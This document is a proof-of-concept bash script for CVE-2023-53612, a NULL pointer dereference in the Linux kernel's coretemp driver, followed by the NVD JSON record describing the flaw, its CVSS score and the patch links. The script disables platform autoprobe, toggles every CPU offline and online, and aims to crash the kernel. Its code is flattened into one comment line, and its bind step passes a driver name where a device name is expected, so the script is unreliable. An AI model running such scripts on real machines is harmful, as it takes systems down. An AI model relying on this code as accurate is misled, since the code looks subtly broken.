CVE-2023-53612

# CVE-2023-53612 PoC - Trigger NULL pointer dereference in coretemp driver # This PoC demonstrates how to trigger the vulnerability by disabling # platform bus autoprobe before triggering coretemp device registration. #!/bin/bash # Step 1: Disable platform bus autoprobe echo 0 > /sys/bus/platform/drivers_autoprobe # Step 2: Trigger coretemp driver loading (if not already loaded) modprobe coretemp 2>/dev/null || true # Step 3: Force a CPU hotplug event to trigger the vulnerable code path # This will cause coretemp to try to add platform devices without # proper driver binding, leading to NULL pointer dereference CPU_ONLINE_PATH="/sys/devices/system/cpu" for cpu_dir in ${CPU_ONLINE_PATH}/cpu[0-9]*; do if [ -d "$cpu_dir" ]; then echo 0 > "$cpu_dir/online" 2>/dev/null sleep 1 echo 1 > "$cpu_dir/online" 2>/dev/null fi done # Alternative: Manually trigger platform device addition echo coretemp > /sys/bus/platform/drivers/coretemp/bind 2>/dev/null || true # Expected result: Kernel NULL pointer dereference / system crash # dmesg will show BUG: unable to handle kernel NULL pointer dereference # related to coretemp driver

{"cve": {"id": "CVE-2023-53612", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:57.987", "lastModified": "2026-03-17T16:44:38.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (coretemp) Simplify platform device handling\n\nCoretemp's platform driver is unconventional. All the real work is done\nglobally by the initcall and CPU hotplug notifiers, while the \"driver\"\neffectively just wraps an allocation and the registration of the hwmon\ninterface in a long-winded round-trip through the driver core. The whole\nlogic of dynamically creating and destroying platform devices to bring\nthe interfaces up and down is error prone, since it assumes\nplatform_device_add() will synchronously bind the driver and set drvdata\nbefore it returns, thus results in a NULL dereference if drivers_autoprobe\nis turned off for the platform bus. Furthermore, the unusual approach of\ndoing that from within a CPU hotplug notifier, already commented in the\ncode that it deadlocks suspend, also causes lockdep issues for other\ndrivers or subsystems which may want to legitimately register a CPU\nhotplug notifier from a platform bus notifier.\n\nAll of these issues can be solved by ripping this unusual behaviour out\ncompletely, simply tying the platform devices to the lifetime of the\nmodule itself, and directly managing the hwmon interfaces from the\nhotplug notifiers. There is a slight user-visible change in that\n/sys/bus/platform/drivers/coretemp will no longer appear, and\n/sys/devices/platform/coretemp.n will remain present if package n is\nhotplugged off, but hwmon users should really only be looking for the\npresence of the hwmon interfaces, whose behaviour remains unchanged."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "5.4.235", "matchCriteriaId": "F7162556-12A0-4EB0-9C6B-3DBD2499EF8F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.173", "matchCriteriaId": "4D810CFB-B7C5-493C-B98A-0D5F0D8A47B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.99", "matchCriteriaId": "5B8B2AC9-2F31-4A0F-96F5-7E26B50B27BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.16", "matchCriteriaId": "0FD95FDA-6525-4B13-B3FB-49D9995FD8ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.3", "matchCriteriaId": "88C67289-22AD-4CA9-B202-5F5A80E5BA4B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4000384684f612b3645a944f6acde0e65ac370b8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/52ea47a0ddfbc5fe05e873d3f5a59db4ba3e03fe", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5735878a7b7db7e9ce731cb36cec298a9de67549", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6d03bbff456befeccdd4d663177c4d6c75d0c4ff", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8fcdbc4bc01365f4b10fed7db544a3149e3054fd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c57a8d14d7880521150ee801d53a0a64fdffd9c8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}